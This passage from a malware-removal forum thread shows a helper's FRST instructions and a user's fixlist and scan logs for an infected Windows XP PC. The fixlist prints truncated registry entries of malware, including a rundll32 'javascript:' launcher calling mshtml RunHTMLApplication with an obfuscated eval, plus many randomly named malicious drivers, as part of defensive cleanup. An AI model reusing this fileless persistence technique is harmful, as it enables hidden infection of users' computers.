Description: mbam.exe1.51.0.1118hungapp0.0.0.000000000

Error: (08/31/2014 03:30:34 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: iexplore.exe8.0.6001.18702hungapp0.0.0.000000000

Error: (08/31/2014 03:28:56 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: iexplore.exe8.0.6001.18702hungapp0.0.0.000000000

Error: (08/31/2014 03:28:56 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: iexplore.exe8.0.6001.18702hungapp0.0.0.000000000

Error: (08/31/2014 03:14:03 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: iexplore.exe8.0.6001.18702hungapp0.0.0.000000000


==================== Memory info ===========================

Processor: Intel® Core™2 Duo CPU E7400 @ 2.80GHz
Percentage of memory in use: 85%
Total physical RAM: 2036.89 MB
Available physical RAM: 303.5 MB
Total Pagefile: 3929.95 MB
Available Pagefile: 1786.43 MB
Total Virtual: 2047.88 MB
Available Virtual: 1947.06 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:298.05 GB) (Free:266.83 GB) NTFS ==>[Drive with boot components (Windows XP)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 298.1 GB) (Disk ID: A42D04A3)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Active) - (Size=298.1 GB) - (Type=07 NTFS)

==================== End Of Log ============================



#6 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:11:45 AM

Posted 01 September 2014 - 12:39 PM

Yes this second computer is infected, too.
Please be careful that you don't interchange my instructions for the two computers. The following steps are for the second computer:


Step 1

Please download this attached Attached File  fixlist.txt   5.96KB   3 downloads and save it in the same directory as FRST.
  • Start FRST with Administrator privileges.
  • Press the Fix button.
  • When finished, a log file (Fixlog.txt) pops up and is saved to the same location the tool was run from.
    Please copy and paste its contents in your next reply.


Step 2

Start FRST with administator privileges.
  • Press the Scan button.
  • When finished, FRST will produce a log (FRST.txt) in the same directory the tool was run from.
    Please copy and paste this log in your next reply.


#7 litepc

litepc
  • Topic Starter

  • Members
  • 12 posts
  • OFFLINE
  •  
  • Local time:05:45 AM

Posted 01 September 2014 - 01:19 PM

Ok here are the 2 new files for the 2nd PC

 

CMD: taskkill /f /t /im dllhost.exe
Winlogon\Notify\intelsusb: ntusbw32.dll [X]
S2 intelusb3; C:\WINDOWS\system32\inusbw32.dll [X]
C:\WINDOWS\system32\inusbw32.dll
C:\WINDOWS\system32\ntusbw32.dll
HKLM\...99B7938DA9E4}\LocalServer32: [Default-wmiprvse] rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 220 more characters). <==== ATTENTION!
HKLM\...99B7938DA9E4}\LocalServer32: [a] #@~^wH4AAA==n{F+2im'xh,)mDk-+or8%mYvEUmDb2ORUtVsJbIStrVc+e'*+*    Y.zPhxlc3XwC    NAx\bDKU:xO?DDrUT/ (the data entry has 32372 more characters). <==== ATTENTION!
InvalidSubkeyName: [HKLM\Software\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32\******<*>] <===== ATTENTION
Handler: qbwc - {FC598A64-626C-4447-85B8-53150405FD57} - C:\WINDOWS\system32\mscoree.dll (Microsoft Corporation)
Winsock: Catalog5 01 mswsock.dll File Not found () ATTENTION: The LibraryPath should be "%SystemRoot%\System32\mswsock.dll"
Winsock: Catalog5 03 mswsock.dll File Not found () ATTENTION: The LibraryPath should be "%SystemRoot%\System32\mswsock.dll"
S1 aiihtvcz; \??\C:\WINDOWS\system32\drivers\aiihtvcz.sys [X]
S1 ailnikoh; \??\C:\WINDOWS\system32\drivers\ailnikoh.sys [X]
S1 aodyekkc; \??\C:\WINDOWS\system32\drivers\aodyekkc.sys [X]
S1 aqtnxesc; \??\C:\WINDOWS\system32\drivers\aqtnxesc.sys [X]
S1 btrkhckt; \??\C:\WINDOWS\system32\drivers\btrkhckt.sys [X]
S1 cehdbmir; \??\C:\WINDOWS\system32\drivers\cehdbmir.sys [X]
S3 cpuz136; \??\C:\DOCUME~1\LW\LOCALS~1\Temp\cpuz136\cpuz136_x32.sys [X]
S1 crmhksvq; \??\C:\WINDOWS\system32\drivers\crmhksvq.sys [X]
S1 dcphysdl; \??\C:\WINDOWS\system32\drivers\dcphysdl.sys [X]
S1 dctzhdkr; \??\C:\WINDOWS\system32\drivers\dctzhdkr.sys [X]
S1 dhsjwnsa; \??\C:\WINDOWS\system32\drivers\dhsjwnsa.sys [X]
S1 diiedivm; \??\C:\WINDOWS\system32\drivers\diiedivm.sys [X]
S1 dkqlfxtu; \??\C:\WINDOWS\system32\drivers\dkqlfxtu.sys [X]
S1 dywxjbpu; \??\C:\WINDOWS\system32\drivers\dywxjbpu.sys [X]
S1 elanvibc; \??\C:\WINDOWS\system32\drivers\elanvibc.sys [X]
S1 elueucdm; \??\C:\WINDOWS\system32\drivers\elueucdm.sys [X]
S1 emqorjrh; \??\C:\WINDOWS\system32\drivers\emqorjrh.sys [X]
S1 ffwjjktp; \??\C:\WINDOWS\system32\drivers\ffwjjktp.sys [X]
S1 fuwdcpag; \??\C:\WINDOWS\system32\drivers\fuwdcpag.sys [X]
S1 gjqdovsr; \??\C:\WINDOWS\system32\drivers\gjqdovsr.sys [X]
S1 hdzpacyh; \??\C:\WINDOWS\system32\drivers\hdzpacyh.sys [X]
S1 hkjraftu; \??\C:\WINDOWS\system32\drivers\hkjraftu.sys [X]
S1 hkqzjurj; \??\C:\WINDOWS\system32\drivers\hkqzjurj.sys [X]
S1 hudgwneh; \??\C:\WINDOWS\system32\drivers\hudgwneh.sys [X]
S1 hwnaxqhi; \??\C:\WINDOWS\system32\drivers\hwnaxqhi.sys [X]
S1 icjfktdr; \??\C:\WINDOWS\system32\drivers\icjfktdr.sys [X]
S1 ifcaadgw; \??\C:\WINDOWS\system32\drivers\ifcaadgw.sys [X]
S1 iojgrniz; \??\C:\WINDOWS\system32\drivers\iojgrniz.sys [X]
S1 itdfmkmf; \??\C:\WINDOWS\system32\drivers\itdfmkmf.sys [X]
S1 izuejwga; \??\C:\WINDOWS\system32\drivers\izuejwga.sys [X]
S1 jkysozto; \??\C:\WINDOWS\system32\drivers\jkysozto.sys [X]
S1 jneissmq; \??\C:\WINDOWS\system32\drivers\jneissmq.sys [X]
S1 jumggzng; \??\C:\WINDOWS\system32\drivers\jumggzng.sys [X]
S1 kbuuifwp; \??\C:\WINDOWS\system32\drivers\kbuuifwp.sys [X]
S1 krsrhnrw; \??\C:\WINDOWS\system32\drivers\krsrhnrw.sys [X]
S1 lksnxksg; \??\C:\WINDOWS\system32\drivers\lksnxksg.sys [X]
S1 lxnsddjw; \??\C:\WINDOWS\system32\drivers\lxnsddjw.sys [X]
S1 nmarzldd; \??\C:\WINDOWS\system32\drivers\nmarzldd.sys [X]
S1 oyqnomxu; \??\C:\WINDOWS\system32\drivers\oyqnomxu.sys [X]
S1 oznnujzj; \??\C:\WINDOWS\system32\drivers\oznnujzj.sys [X]
S1 pqebwcvo; \??\C:\WINDOWS\system32\drivers\pqebwcvo.sys [X]
S1 pxjpomgz; \??\C:\WINDOWS\system32\drivers\pxjpomgz.sys [X]
S1 qbjxztan; \??\C:\WINDOWS\system32\drivers\qbjxztan.sys [X]
S1 qdqqqeox; \??\C:\WINDOWS\system32\drivers\qdqqqeox.sys [X]
S1 qtiughlc; \??\C:\WINDOWS\system32\drivers\qtiughlc.sys [X]
S1 qvndeefi; \??\C:\WINDOWS\system32\drivers\qvndeefi.sys [X]
S1 rvweqwzh; \??\C:\WINDOWS\system32\drivers\rvweqwzh.sys [X]
S1 rycglvcj; \??\C:\WINDOWS\system32\drivers\rycglvcj.sys [X]
S1 spsewroy; \??\C:\WINDOWS\system32\drivers\spsewroy.sys [X]
S1 tddacvcd; \??\C:\WINDOWS\system32\drivers\tddacvcd.sys [X]
S1 tqolobyj; \??\C:\WINDOWS\system32\drivers\tqolobyj.sys [X]
S1 uxqezgeh; \??\C:\WINDOWS\system32\drivers\uxqezgeh.sys [X]
S1 vdmrhszs; \??\C:\WINDOWS\system32\drivers\vdmrhszs.sys [X]
S1 vxgwctzc; \??\C:\WINDOWS\system32\drivers\vxgwctzc.sys [X]
S1 wlkiibdz; \??\C:\WINDOWS\system32\drivers\wlkiibdz.sys [X]
S1 wnhyorkd; \??\C:\WINDOWS\system32\drivers\wnhyorkd.sys [X]
2014-08-28 19:17 - 2014-08-28 19:47 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\SysutilHiggs
2014-08-28 19:16 - 2014-08-28 19:46 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\CottonNoteworthy
2014-08-28 19:15 - 2014-08-28 19:50 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\SupporterRadio
2014-08-28 19:15 - 2014-08-28 19:17 - 00000000 ____D () C:\Documents and Settings\LW\Local Settings\Application Data\SupporterHumble
Task: C:\WINDOWS\Tasks\At10.job => ?
Task: C:\WINDOWS\Tasks\At12.job => ?
Task: C:\WINDOWS\Tasks\At14.job => ?
Task: C:\WINDOWS\Tasks\At16.job => ?
Task: C:\WINDOWS\Tasks\At18.job => ?
Task: C:\WINDOWS\Tasks\At2.job => ?
Task: C:\WINDOWS\Tasks\At20.job => ?
Task: C:\WINDOWS\Tasks\At22.job => ?
Task: C:\WINDOWS\Tasks\At24.job => ?
Task: C:\WINDOWS\Tasks\At26.job => ?
Task: C:\WINDOWS\Tasks\At28.job => ?
Task: C:\WINDOWS\Tasks\At30.job => ?
Task: C:\WINDOWS\Tasks\At32.job => ?
Task: C:\WINDOWS\Tasks\At34.job => ?
Task: C:\WINDOWS\Tasks\At36.job => ?
Task: C:\WINDOWS\Tasks\At38.job => ?
Task: C:\WINDOWS\Tasks\At4.job => ?
Task: C:\WINDOWS\Tasks\At40.job => ?
Task: C:\WINDOWS\Tasks\At42.job => ?
Task: C:\WINDOWS\Tasks\At44.job => ?
Task: C:\WINDOWS\Tasks\At46.job => ?
Task: C:\WINDOWS\Tasks\At48.job => ?
Task: C:\WINDOWS\Tasks\At6.job => ?
Task: C:\WINDOWS\Tasks\At8.job => ?
EmptyTemp:

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version:31-08-2014 02
Ran by LW (administrator) on TravelR on 01-09-2014 14:15:09
Running from C:\Documents and Settings\LW\Desktop\Fr
Platform: Microsoft Windows XP Professional Service Pack 3 (X86) OS Language: English (United States)
Internet Explorer Version 8
Boot Mode: Normal

The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/
Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Enigma Software Group USA, LLC.) C:\PROGRA~1\ENIGMA~1\SPYHUN~1\SH4SER~1.EXE
(Amadeus) C:\Program Files\Automatic Update\AutoUpdate.exe
(ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe
(Starfield Technologies) C:\Program Files\Workspace\offSyncService.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToAssist Remote Support Customer\715\g2ax_service.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2svc.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2comm.exe
(HP) C:\Program Files\HP\HPLaserJetService\HPLaserJetService.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2pre.exe
(Sun Microsystems, Inc.) C:\Program Files\Java\jre6\bin\jqs.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
(Intuit) C:\Program Files\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2tray.exe
(Intuit Inc.) C:\Program Files\Common Files\Intuit\DataProtect\QBIDPService.exe
(Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
(Intel Corporation) C:\WINDOWS\system32\igfxpers.exe
(CyberLink Corp.) C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe
(Intel Corporation) C:\WINDOWS\system32\igfxsrvc.exe
(Intel Corporation) C:\WINDOWS\system32\hkcmd.exe
(Hewlett-Packard Company) C:\Program Files\HP\ToolboxFX\bin\HPTLBXFX.exe
(Analog Devices, Inc.) C:\Program Files\Analog Devices\Core\smax4pnp.exe
() C:\Program Files\HP\Dfawep\bin\hpbdfawep.exe
(Hewlett-Packard) C:\Program Files\HP\HP Software Update\hpwuschd2.exe
(Enigma Software Group USA, LLC.) C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe
(Google Inc.) C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
(Starfield Technologies) C:\Program Files\Workspace\workspaceupdate.exe
(24im LLC) C:\Program Files\24im\24im Messenger\IMC.EXE
(Intuit Inc.) C:\Program Files\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToAssist Remote Support Customer\715\g2ax_comm_customer.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToAssist Remote Support Customer\715\g2ax_system_customer.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToAssist Remote Support Customer\715\g2ax_user_customer.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToAssist Remote Support Customer\715\g2ax_host.exe
(Microsoft Corporation) C:\WINDOWS\system32\wscntfy.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToAssist Remote Support Customer\715\g2ax_user_medium_customer.exe
(Microsoft Corporation) C:\WINDOWS\system32\msfeedssync.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [PDVDDXSrv] => C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe [128232 2009-02-04] (CyberLink Corp.)
HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-04-21] (Apple Inc.)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM\...\Run: [ToolboxFX] => C:\Program Files\HP\ToolboxFX\bin\HPTLBXFX.exe [58936 2010-10-25] (Hewlett-Packard Company)
HKLM\...\Run: [SoundMAXPnP] => C:\Program Files\Analog Devices\Core\smax4pnp.exe [1044480 2008-07-15] (Analog Devices, Inc.)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\qttask.exe [421888 2014-01-17] (Apple Inc.)
HKLM\...\Run: [Malwarebytes' Anti-Malware] => C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe [449608 2011-08-31] (Malwarebytes Corporation)
HKLM\...\Run: [Intuit SyncManager] => C:\Program Files\Common Files\Intuit\Sync\IntuitSyncManager.exe [2786104 2013-05-31] (Intuit Inc. All rights reserved.)
HKLM\...\Run: [hpbdfawep] => C:\Program Files\HP\Dfawep\bin\hpbdfawep.exe [954368 2007-04-25] ()
HKLM\...\Run: [HP Software Update] => C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe [49208 2011-10-28] (Hewlett-Packard)
HKLM\...\Run: [SpyHunter Security Suite] => C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe [6434176 2014-01-09] (Enigma Software Group USA, LLC.)
Winlogon\Notify\GoToAssist Express Customer: C:\Program Files\Citrix\GoToAssist Remote Support Customer\715\g2ax_winlogon.dll (Citrix Online, a division of Citrix Systems, Inc.)
Winlogon\Notify\GoToMyPC: C:\Program Files\Citrix\GoToMyPC\G2WinLogon.dll (Citrix Online, a division of Citrix Systems, Inc.)
HKU\.DEFAULT\...\RunOnce: [FlashPlayerUpdate] => C:\WINDOWS\system32\Macromed\Flash\FlashUtil32_11_9_900_170_ActiveX.exe [839560 2014-01-01] (Adobe Systems Incorporated)
HKU\S-1-5-21-1173838982-2468196426-3268084377-1009\...\Run: [swg] => C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2010-05-24] (Google Inc.)
HKU\S-1-5-21-1173838982-2468196426-3268084377-1009\...\Run: [Starfield Updater] => C:\Program Files\Workspace\WorkspaceUpdate.exe [35008 2014-09-01] (Starfield Technologies)
HKU\S-1-5-21-1173838982-2468196426-3268084377-1009\...\Run: [InbitIMC] => C:\Program Files\24im\24im Messenger\IMC.EXE [3423744 2013-07-08] (24im LLC)
Startup: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Intuit Data Protect.lnk
ShortcutTarget: Intuit Data Protect.lnk -> C:\Program Files\Common Files\Intuit\DataProtect\IntuitDataProtect.exe (Intuit Inc.)
Startup: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\QuickBooks Update Agent.lnk
ShortcutTarget: QuickBooks Update Agent.lnk -> C:\Program Files\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe (Intuit Inc.)
Startup: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\QuickBooks_Standard_21.lnk
ShortcutTarget: QuickBooks_Standard_21.lnk -> C:\Program Files\Intuit\QuickBooks 2012\QBW32.EXE (Intuit Inc.)
ShellIconOverlayIdentifiers: off0 -> {8E33AEC3-C5F2-43C4-B048-9E3EB19B1DD5} => C:\Program Files\Workspace\offsyncext.dll (Starfield Technologies, LLC)
ShellIconOverlayIdentifiers: off1 -> {8E33AEC4-C5F2-43C4-B048-9E3EB19B1DD5} => C:\Program Files\Workspace\offsyncext.dll (Starfield Technologies, LLC)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://google.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.live.com
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.msn.com/USREL/1
HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://search.msn.com/sphome.aspx
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO: Google Toolbar Notifier BHO -> {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} -> C:\Program Files\Google\GoogleToolbarNotifier\5.7.9012.1008\swg.dll (Google Inc.)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
DPF: {051FE707-9706-11D5-A836-000102A7C938} http://certificates.amadeusvista.com/sgwadmin/common/AutoUpdateATL26P520.CAB
DPF: {17492023-C23A-453E-A040-C7C580BBF700} http://download.microsoft.com/download/E/5/6/E5611B10-0D6D-4117-8430-A67417AA88CD/LegitCheckControl.cab
DPF: {3839EEB1-774E-40AC-BB55-1FFF0F09FFBC} http://extranets.us.amadeus.com/techservices/documents/SoftwareDistribution/Amadeus-CS-MIA/AmadeusRailKeyAgent/v1003/install.cab
DPF: {469C92F9-CA8E-4C3E-9AD4-F74EEF097BCA} http://diagnostic.amadeus.com/travelagencies/Cabs/DS_Diagnostic.cab
DPF: {5CCB8990-66EF-4466-B051-CD27FA3821DF} http://content.amadeus.com/Scripts/AmadeusNALibrary/V2.0.0/install.cab
DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} http://update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1251711551578
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/update/1.6.0/jinstall-1_6_0_15-windows-i586.cab
DPF: {9D96A8C3-A6DA-47CC-BD44-A968B60C01EB} http://extranet.us.amadeus.com/techservices/documents/softwaredistribution/amadeus-cs-mia/FXG/v1.2.3/MasterPricerFXM.cab
DPF: {B3E32D88-8E7F-468F-B0E2-3A300FD4A82C} http://myitlab.pearsoned.com/Pegasus/Modules/SIMIntegration/Resources/ax/stub.cab
DPF: {C9E2242D-DC05-4C54-9483-A5C90653F7BC} https://techinline.net/Client/TIClient.cab
DPF: {CAFEEFAC-0016-0000-0015-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_15-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_15-windows-i586.cab
DPF: {DE625294-70E6-45ED-B895-CFFA13AEB044} http://80.179.197.227/activex/AMC.cab
DPF: {E06E2E99-0AA1-11D4-ABA6-0060082AA75C} https://ncr.webex.com/client/WBXclient-T27L10NSP32EP1-13926/webex/ieatgpc.cab
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
DPF: {E90EF4C9-1476-4C49-B926-97C7D9D30A06} http://certificates.amadeusvista.com/certificateinfo/CCCert_Info.CAB
DPF: {F96020DD-C373-44A0-82B6-064EF0AEEAE3} http://certificates.amadeusvista.com/sgwadmin/RegSiteTools.cab
Handler: intu-help-qb2 - {84D77A00-41B5-4b8b-8ADF-86486D72E749} - C:\Program Files\Intuit\QuickBooks 2006\HelpAsyncPluggableProtocol.dll (Intuit, Inc.)
Handler: intu-help-qb5 - {867FCB77-9823-4cd6-8210-D85F968D466F} - C:\Program Files\Intuit\QuickBooks 2012\HelpAsyncPluggableProtocol.dll (Intuit, Inc.)
Handler: ms-itss - {0A9007C0-4076-11D3-8789-0000F8105754} - C:\Program Files\Common Files\Microsoft Shared\Information Retrieval\MSITSS.DLL (Microsoft Corporation)
Tcpip\Parameters: [DhcpNameServer] 208.67.222.222 208.67.220.220
Tcpip\..\Interfaces\{03F00D1D-4288-4901-A4C3-F42AA00B1C9A}: [NameServer] 8.8.8.8,8.8.4.4,4.2.2.1,4.2.2.2,208.67.222.222,208.67.220.220,8.26.56.26,8.20.247.20,156.154.70.1,156.154.71.1

FireFox:
========
FF ProfilePath: C:\Documents and Settings\LW\Application Data\Mozilla\Firefox\Profiles\acyn7swx.default-1409541858578
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF32_11_9_900_117.dll ()
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @citrixonline.com/appdetectorplugin -> C:\Documents and Settings\LW\Local Settings\Application Data\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
FF Plugin HKCU: @starfield.com/off -> C:\Documents and Settings\LW\Application Data\Mozilla\Plugins\npoff.dll ( Starfield Technologies, LLC.)
FF Plugin HKCU: @starfield.com/wbe -> C:\Documents and Settings\LW\Application Data\Mozilla\Plugins\npwbe.dll (Starfield Technology, LLC)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\NPOFFICE.DLL (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin2.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin3.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin4.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin5.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Documents and Settings\LW\Application Data\mozilla\plugins\npoff.dll ( Starfield Technologies, LLC.)
FF Plugin ProgramFiles/Appdata: C:\Documents and Settings\LW\Application Data\mozilla\plugins\npwbe.dll (Starfield Technology, LLC)
FF Extension: WBE Paste - C:\Documents and Settings\LW\Application Data\Mozilla\Extensions\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}\wbepaste@starfield [2014-09-01]
FF Extension: Firefox Old Version Update Hotfix - C:\Documents and Settings\LW\Application Data\Mozilla\Firefox\Profiles\acyn7swx.default-1409541858578\Extensions\firefox-hotfix@mozilla.org.xpi [2014-08-31]
FF HKLM\...\Firefox\Extensions: [jqs@sun.com] - C:\Program Files\Java\jre6\lib\deploy\jqs\ff
FF Extension: Java Quick Starter - C:\Program Files\Java\jre6\lib\deploy\jqs\ff [2009-08-22]
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-12-27]
FF HKLM\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird
FF Extension: ESET Smart Security Extension - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird [2014-01-01]

Chrome:
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR CustomProfile: C:\Documents and Settings\LW\Local Settings\Application Data\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Documents and Settings\LW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-07-24]
CHR Extension: (Google Drive) - C:\Documents and Settings\LW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-07-24]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Documents and Settings\LW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-07-31]
CHR Extension: (YouTube) - C:\Documents and Settings\LW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-07-24]
CHR Extension: (Google Search) - C:\Documents and Settings\LW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-07-24]
CHR Extension: (Google Wallet) - C:\Documents and Settings\LW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-07-24]
CHR Extension: (Gmail) - C:\Documents and Settings\LW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-07-24]
CHR HKLM\...\Chrome\Extension: [./0123456789:;<=>?@ABCDEFGHIJKLM] - C:\Documents and Settings\Lazer\Local Settings\Application Data\¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ []

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 Amadeus Automatic Update; C:\Program Files\Automatic Update\AutoUpdate.exe [236384 2013-03-28] (Amadeus)
R2 ekrn; C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe [1341664 2013-03-04] (ESET)
R2 File Backup; C:\Program Files\Workspace\offSyncService.exe [1187040 2013-07-22] (Starfield Technologies)
R2 GoToAssist Remote Support Customer; C:\Program Files\Citrix\GoToAssist Remote Support Customer\715\g2ax_service.exe [610888 2014-06-18] (Citrix Online, a division of Citrix Systems, Inc.)
R2 GoToMyPC; C:\Program Files\Citrix\GoToMyPC\g2svc.exe [1335640 2014-01-30] (Citrix Online, a division of Citrix Systems, Inc.)
R2 HP LaserJet Service; C:\Program Files\HP\HPLaserJetService\HPLaserJetService.exe [145920 2010-10-25] (HP) [File not signed]
S3 IDriverT; C:\Program Files\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe [69632 2005-11-14] (Macrovision Corporation) [File not signed]
R2 JavaQuickStarterService; C:\Program Files\Java\jre6\bin\jqs.exe [153376 2009-07-25] (Sun Microsystems, Inc.)
